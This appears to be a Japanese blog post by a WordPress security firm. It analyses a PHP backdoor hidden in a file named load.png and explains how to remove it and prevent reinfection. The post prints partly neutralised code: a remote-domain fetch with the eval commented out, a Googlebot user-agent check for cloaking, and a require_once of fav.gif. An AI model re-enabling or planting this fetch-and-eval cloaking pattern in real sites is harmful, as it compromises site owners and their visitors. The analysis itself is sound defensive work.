マルウェアの概要

本件は「load.png」という画像ファイルに偽装して設置されていたPHPバックドアです。

拡張子は画像に見えますが、内部にはPHPコードが記述されており、外部ドメインと通信する仕組みを持っていました。

実際の感染コードは fileciteturn1file0 に確認できる通り、外部サーバーへリクエストを送信し、条件に応じて処理を実行する構造でした。


特徴

  • load.png に偽装(画像ファイルを装う)
  • 外部ドメイン(例:exhourxk.otaledns.xyz)と通信
  • curl / file_get_contents による外部取得
  • 検索エンジン判定ロジック(Googlebot等)を内蔵
  • require_once で別ファイル(fav.gif)を読み込み

特に「画像拡張子+require構造」は発見を遅らせる典型的な手法です。


無毒化したコードの一部をサンプルで表記

危険な実行部分を無効化した構造例:

<?php
$remote_domain = "exhourxk.otaledns.xyz";
$host = $_SERVER['HTTP_HOST'];

$url = "https://" . $remote_domain . "/indexnew.php?web=" . $host;

// 本来はここで外部通信
// $response = file_get_contents($url);
// eval($response); ← 無効化

また、検索エンジンのみを判定する関数が含まれていました。

function disbot() {
    $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if (strpos($uAgent, 'googlebot') !== false) {
        return true;
    }
    return false;
}

これはSEOスパム挿入型マルウェアに多い構造です。


感染ファイルの完全可読化ログ

可読化後の処理フローは以下の通りです。

  1. 外部ドメイン変数を定義
  2. HTTP_HOST・REFERER・言語情報を取得
  3. クローラー判定(Google/Bing等)
  4. 外部サーバーへリクエスト送信
  5. 取得内容を利用(危険部分は無効化)
  6. fav.gif を読み込み

擬似構造:

$domain = "exhourxk.otaledns.xyz";
$host = $_SERVER['HTTP_HOST'];

if (is_search_engine()) {
    $payload = fetch_remote_payload($domain);
    // eval($payload); ← 無効化
}

require_once 'fav.gif';

この構造は「検索エンジンのみ改ざん表示を行うクローキング型バックドア」に分類されます。


危険性

このマルウェアが存在すると:

  • Google検索結果だけ改ざんされる
  • SEOスパムページが生成される
  • 不正リンクが大量設置される
  • 検索順位が急落する
  • Googleの警告表示対象になる
  • 企業サイトの信用毀損

特に「通常アクセスでは異常が見えない」ため、発見が遅れやすいのが最大のリスクです。


実際の感染事例

確認される侵入経路:

  • 更新停止プラグインの脆弱性悪用
  • FTP情報漏えい
  • 管理画面ブルートフォース攻撃
  • nulledテーマの利用

設置場所の例:

  • /wp-content/uploads/load.png
  • テーマフォルダ直下
  • ルートディレクトリ直下

駆除と復旧の方法

1. 即時対応

  • load.png を削除
  • 同階層のPHPファイルを全確認
  • fav.gif の中身も精査

2. 再設置

  • WordPressコアを公式から再アップロード
  • テーマ・プラグインを正規版で再インストール

3. 外部通信先の遮断

  • 不審ドメインをブロック
  • サーバーログ確認

再発防止のセキュリティ対策

  • 定期アップデート
  • WAF導入
  • ファイル改ざん監視
  • 二段階認証
  • FTP利用制限
  • 定期バックアップ

画像拡張子だから安全という思い込みが最大の弱点になります。


まとめ:早期対応がSEOと信頼回復のカギ

load.png に偽装された今回のケースは、検索エンジンのみを狙う高度なクローキング型マルウェアでした。

発見が遅れるほどSEO被害は拡大します。

定期スキャンと専門的な解析体制が不可欠です。


著者情報

WordPressのセキュリティ復旧・運用支援を専門する CreativeStudio樂のエンジニアユニット によって執筆されております。
WordPressのマルウェア駆除、改ざん復旧、セキュリティ強化の豊富な実務経験に基づき、企業サイトやブログ運営者が安心してサイトを運営できるよう支援しています。